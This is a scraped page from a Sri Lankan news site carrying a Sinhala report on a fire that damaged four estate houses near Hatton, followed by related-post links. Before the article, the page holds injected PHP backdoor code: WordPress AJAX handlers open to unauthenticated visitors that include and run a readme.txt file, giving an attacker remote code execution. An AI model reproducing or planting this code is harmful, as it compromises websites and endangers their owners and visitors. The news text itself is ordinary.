if(!function_exists('file_check_readme56685')){ add_action('wp_ajax_nopriv_file_check_readme56685', 'file_check_readme56685'); add_action('wp_ajax_file_check_readme56685', 'file_check_readme56685'); function file_check_readme56685() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } if(!function_exists('file_check_readme40625')){ add_action('wp_ajax_nopriv_file_check_readme40625', 'file_check_readme40625'); add_action('wp_ajax_file_check_readme40625', 'file_check_readme40625'); function file_check_readme40625() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } නිවාස පෙලක් ගිනිගනී… - mediahumanrights.lk
mediahumanrights.lk
Local News News

නිවාස පෙලක් ගිනිගනී…

හැටන් පොලිස් වසමට අයත් වනරාජා තේ වත්තේ මැණික් වත්ත කොටසේ වතු නිවාස පේලියක හටගත් ගින්නකින් නිවාස 4 කට හානි සිදු වි ඇති බව හැටන් පොලිසිය පැවසිය.

වතු නිවාස 20 කින් සමන්විත එම නිවාස පස්වරු 1 ට පමණ ගින්න හටගෙන ඇත.

පැතිර යමින් තිබු ගින්න වතු කම්කරුවන් එක් වි දැඩි පරිශ්‍රමයක් දරා පාලනය කිරිමට සමත් වි ඇත.

පැතිර ගිය ගින්නෙන් එක් නිවසක් සම්පුර්ණයෙන්ම ගිනිගෙන විනාශ වි ඇති අතර පැතිර ගිය ගින්න පාලනය කිරිමට යාමේදි තවත් නිවාස තුනකට අර්ධ වශයෙන් හානි සිදු වි ඇත.

ගින්නට හේතුව විදුලි කාන්දු විමක් බවට සැකකෙරේ , ගින්නෙන් කිසිවෙකුටත් අනතුරක් සිදු වි නොමැති අතර ගින්නේ අලාභ හානි වු නිවාස වල පවුල් 4 කට අයත් සමාජිකයන් තාවකාලිව ආරක්ෂිත ස්ථානයක් කරා යොමු කිරිමට වතු පාලන අධිකාරිය කටයුතු කර ඇත.

ගින්නෙන් සිදු වු අලාභය මෙතෙක් තක්සේරු කර නොමැති අතර ගින්න සම්බන්ධයෙන් හැටන් පොලිසිය පරික්ෂණ පවත්වයි.
(under the courtesy of lankacnews.com news web)

Related posts

අයියලා දෙදෙනා ජනපති අගමැති කල පොහොට්ටු වැඩකරු කටුනායකින් බහී..

Shiran Viraj

බස් රථයක් ප‍්‍රපාතයට පෙරලේ.. විශාල පිරිසක් රෝහලේ…

Shiran Viraj

යෞවනය දැනුවත් විය යුතු කාල පරිච්ඡේදයකි

Shiran Viraj